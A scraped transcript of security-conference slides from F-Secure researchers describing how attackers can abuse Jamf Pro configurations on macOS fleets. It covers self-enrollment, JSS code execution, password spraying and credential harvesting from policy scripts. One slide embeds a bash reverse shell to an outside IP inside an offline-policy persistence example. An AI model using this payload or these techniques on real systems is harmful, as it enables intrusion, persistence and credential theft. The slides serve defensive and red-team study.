AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON...
Transcript of AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON...
![Page 1: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/1.jpg)
Luke RobertsCalum Hall
AN ATTACKER'S PERSPECTIVE
ON JAMF CONFIGURATIONS
![Page 2: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/2.jpg)
HOW WE COMPROMISED YOUR MACOSESTATE …
![Page 3: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/3.jpg)
IN 5 MINUTES…
![Page 4: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/4.jpg)
FROM THE INTERNET!
![Page 5: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/5.jpg)
WHO ARE WE?
Calum Hall@_calumhall
Luke Roberts@rookuu_
![Page 6: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/6.jpg)
MACOSENVIRONMENTS
![Page 7: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/7.jpg)
SELF MANAGED
§ Common with developers
§ Lack of security controls
§ Difficult to integrate
CUSTOMENVIRONMENTS
§ Can be tuned to your needs
§ Extensive setup
§ High maintenance
§ Tech companies like Google, Facebook
IT MANAGEMENTSOLUTIONS
§ 3rd party software: Jamf, Parallels
§ Deployment and management
§ Mobile Device Management (MDM)
![Page 8: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/8.jpg)
“THE STANDARD FOR APPLE IN THE ENTERPRISE”
![Page 9: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/9.jpg)
1
DEPLOYMENT
3
APP MANAGEMENT
5
SELF SERVICE
2
DEVICE MANAGEMENT
4
INVENTORY
6
SECURITY
![Page 10: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/10.jpg)
ATTACKING JAMFJAMF INTERNALSJAMF ATTACK TOOLKIT
AGENDA
![Page 11: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/11.jpg)
JAMFINTERNALS
![Page 12: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/12.jpg)
Jamf Software Server (JSS)§ Web application that functions as the administrative core of Jamf Pro.
Infrastructure Manager§ LDAP proxy between external JSS and an organisations’ directory services
Jamf Agent§ Command line utility that administrates the managed device.
Self-Service§ macOS application that allows users to browse and install or run configuration profiles, policies and apps.
OVERVIEWOF COMPONENTS
https://resources.jamf.com/documents/products/documentation/jamf-pro-10.19.0-administrators-guide.pdf
![Page 13: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/13.jpg)
WHAT ARE WE ATTACKING?
![Page 14: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/14.jpg)
TRADITIONALDEPLOYMENT
![Page 15: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/15.jpg)
CLOUDDEPLOYMENT
![Page 16: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/16.jpg)
© F-SECURE CONSULTING
VSON-PREM CLOUD
What if it breaks?
How do I configure it securely?
How much control do I have?
Who is going to ensure it’s patched?
Ease of deployment
Internet facing attack surface
![Page 17: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/17.jpg)
DEVICEENROLLMENT
Pre-Stage (DEP)
QuickAdd PKG
PKG
Self-enrollment
Recon
![Page 18: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/18.jpg)
JAMFAGENT
EnrollmentPeriodic Check-in
Checks device information
Actions to performon device
ExecuteJSS Instructions
<?device information/>
<device><uuid>A6A978CE-D6F0-5EA8-8C70-EB0CE4FC8A8A</uuid>...
</device>...<commandData><checkForPolicies><ns2:username>admin</ns2:username>
<ns2:trigger>CLIENT_CHECKIN</ns2:trigger><ns2:id>0</ns2:id><ns2:processor>x86_64</ns2:processor><ns2:day>Thu</ns2:day><ns2:hour>16</ns2:hour><ns2:minute>44</ns2:minute>
<ns2:reportedIP>10.12.254.55</ns2:reportedIP></checkForPolicies>
</commandData></content>
</ns2:jamfMessage>
![Page 19: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/19.jpg)
JAMFAGENT
EnrollmentPeriodic Check-in
Checks device information
Actions to performon device
ExecuteJSS Instructions
<?device information/>
<?jamf instructions/>
<ns2:jamfMessage><ns2:policies>
<ns2:policy><ns2:id>6</ns2:id><ns2:name>objsee-example</ns2:name> <ns2:availableOffline>false</ns2:availableOffline> <ns2:scripts>
<ns2:script><ns2:filename>
objsee-script-example</ns2:filename><ns2:contents>
#!/bin/bashecho "Hello World" > /tmp/obts
</ns2:contents></ns2:script>
</ns2:scripts>
</ns2:policy></ns2:policies></ns2:jamfMessage>
![Page 20: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/20.jpg)
CONFIGURINGJAMF
Configuration Items
Uses MDM to push .mobileconfig files
Extension Attributes
Indiscriminate Data Retrieval
Policies (and Scripts)
Performs a Targeted Action on a Device
![Page 21: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/21.jpg)
ADMINISTRATIVETOOLING
SSH
![Page 22: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/22.jpg)
ATTACKINGJAMF
![Page 23: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/23.jpg)
KILLCHAIN
LATERAL MOVEMENT
OBJECTIVE
RECON
DELIVERY
EXPLOIT PERSISTENCE
C2INTERNAL
RECON
Self-enrollment Offline Policies SSH HijackingPolicy Abuse
JSS OSINT Execution via JSSExtended Attributes User Object Enumeration
![Page 24: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/24.jpg)
LATERAL MOVEMENT
OBJECTIVEDELIVERY
EXPLOIT PERSISTENCE
C2INTERNAL
RECON
RECON
![Page 25: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/25.jpg)
![Page 26: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/26.jpg)
![Page 27: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/27.jpg)
![Page 28: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/28.jpg)
RECON
LATERAL MOVEMENT
OBJECTIVEEXPLOIT PERSISTENCE
C2INTERNAL
RECONDELIVERY
![Page 29: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/29.jpg)
SELFENROLLMENT
“… allows users to initiate the enrollment process on their own.”
https://<name>.jamfcloud.com/enroll
![Page 30: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/30.jpg)
SELF ENROLLMENT
1 https://<name>.jamfcloud.com/enroll
2 John Smith
3 🤔
![Page 31: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/31.jpg)
302 200
SELF ENROLLMENT
![Page 32: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/32.jpg)
SELF ENROLLMENT
???
VPNApps Files
![Page 33: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/33.jpg)
RECON
LATERAL MOVEMENT
OBJECTIVEPERSISTENCE
C2INTERNAL
RECONDELIVERY
EXPLOIT
![Page 34: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/34.jpg)
CODE EXECUTION
![Page 35: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/35.jpg)
![Page 36: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/36.jpg)
RECON
LATERAL MOVEMENT
OBJECTIVEEXPLOIT
C2INTERNAL
RECONDELIVERY
PERSISTENCE
![Page 37: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/37.jpg)
© F-SECURE CONSULTING
§ Jamf executes these when JSS is unavailable
§ Execution frequency can be set
(startup, period etc.)
§ Requires admin privileges to write
§ No validation of policy contents
OFFLINE POLICIES
<policies><policy>
<policyResponseUUID>7dc5db3c-5491-40ee-94d3-00b9f4d0bfbb</policyResponseUUID>
<id>3</id><name>offline-script-example</name><availableOffline>true</availableOffline>
...<scripts>
<script><filename>offline-file-
example</filename><osRequirement></osRequirement><priority>After</priority><parameters>
<parameter></parameter><parameter></parameter>
</parameters><contents>
#!/bin/bash/bin/bash >& /dev/tcp/172.16.132.1/8087 0>&1 & disown
</contents></script>
</scripts>... </policy>
![Page 38: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/38.jpg)
RECON
LATERAL MOVEMENT
OBJECTIVEEXPLOIT PERSISTENCE
C2DELIVERY
INTERNAL RECON
![Page 39: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/39.jpg)
USER OBJECT ENUMERATION§ Devices can be enrolled with local JSS credentials
§ Assign AD user for inventory purposes
POST /enroll/enroll.ajax HTTP/1.1Host: jss.f-secure.com:8443Accept: */*X-Requested-With: XMLHttpRequestCookie: JSESSIONID=abcdef
username=a
a
![Page 40: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/40.jpg)
RECON
OBJECTIVEEXPLOIT PERSISTENCE
C2INTERNAL
RECONDELIVERY
LATERAL MOVEMENT
![Page 41: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/41.jpg)
§ “Account to use for managing computers enrolled by user-initiated enrollment”
§ Used to remotely manage devices
§ Passwords can be randomly generated or set
SHAREDMANAGEMENT CREDENTIALS
![Page 42: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/42.jpg)
§ Remote uses this account for administration over SSH
§ Alter SSH binary?
§ Rogue PAM modules?
§ Hijack SSH service?
SHARED MANAGEMENTCREDENTIALS
👌§ Password spray across macOS estate
![Page 43: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/43.jpg)
POLICYABUSE
LAPS.sh
![Page 44: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/44.jpg)
Plaintext Credentials in scripts!
POLICYABUSE
LAPS.sh
![Page 45: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/45.jpg)
POLICYABUSE
LAPS.sh
/Library/Application Support/JAMF/tmp
![Page 46: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/46.jpg)
Script Argument Edition
POLICYABUSE
LAPS.sh
![Page 47: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/47.jpg)
POLICYABUSE
ps aux | grep –i jamf | grep –i path
LAPS.sh
Script Argument Edition
![Page 48: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/48.jpg)
Why not both?
POLICYABUSE
2_Security_Audit_Compliance_API.sh
![Page 49: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/49.jpg)
© F-SECURE CONSULTING
HOW DEEP DOES THE RABBIT HOLE GO?
SPOILER ALERTWE’RESTILL
FALLING
![Page 50: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/50.jpg)
Topic of earlier examples
![Page 51: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/51.jpg)
Jamf Resources: Community Uploaded Files
![Page 52: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/52.jpg)
![Page 53: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/53.jpg)
![Page 54: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/54.jpg)
![Page 55: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/55.jpg)
Extension Attributes can be misconfigured in the same way!
![Page 56: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/56.jpg)
JAMFATTACK TOOLKIT
![Page 57: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/57.jpg)
1
2
3
4
JamfSniper: Password sprays either the JSS enrolment portal or the API.
JamfEnumerator: Queries LDAP user object API to enumerate all user objects in targets directory service.
JamfExplorer: Listens for executing policies and extension attributes to obtain insecurely secured credentials
JamfDumper: Dumps scripts, policies and extension attributes to disk once JSS API access has been obtained.
![Page 58: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/58.jpg)
![Page 59: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/59.jpg)
![Page 60: AN ATTACKER'S PERSPECTIVE ON JAMF CONFIGURATIONS · DELIVERY EXPLOIT PERSISTENCE C2 INTERNAL RECON Self-enrollment Offline Policies SSH Hijacking Policy Abuse JSS OSINT Execution](https://reader035.fdocuments.in/reader035/viewer/2022062605/5fdc6eb51c82c96c0e424e1b/html5/thumbnails/60.jpg)